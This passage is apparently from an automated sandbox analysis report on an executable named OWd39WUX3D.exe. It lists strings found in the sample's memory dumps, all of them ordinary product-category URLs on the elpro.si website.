              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/iso-17665/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/mil-std-461f/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/mil-std-810g/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/sist-en-60529/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/sist-en-61515/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/digita
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/modula
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/nadzor
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/ostalo
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/pisaln
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/prosto
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/zancno
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/livarstvo/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or 